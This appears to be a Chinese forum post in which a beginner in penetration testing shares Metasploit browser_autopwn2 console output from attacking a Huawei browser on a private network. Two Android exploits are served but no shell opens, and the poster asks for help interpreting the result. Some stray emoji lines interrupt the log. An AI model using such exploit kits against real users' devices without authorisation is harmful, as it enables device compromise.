各位大佬麻烦确认一下,我用msf里的browser_autopwn2模块在华为浏览器上扫出来两个漏洞,但是没有弹回shell,再加上我也是刚学习网络渗透,所以不太确定,麻烦各位看一眼,感激不尽!!!
- [+] Please use the following URL for the browser attack:
- [+] BrowserAutoPwn URL: http:// 192.168. 3. 12: 8080/
- [*] Server started.
- [*] Gathering target information for 192.168.3.250
🧑⚕️🥼⚒😄💅
- [*] Sending HTML response to 192.168.3.250
- [-] Target 192.168.3.250 has requested an unknown path: /favicon.ico
- [*] 192.168. 3.250
- [*] 192.168. 3.250
- 🥷👙📬🙄✌
- samsung_knox_smdm_url - Serving exploit ...
- webview_addjavascriptinterface - Serving armle exploit ...
复制代码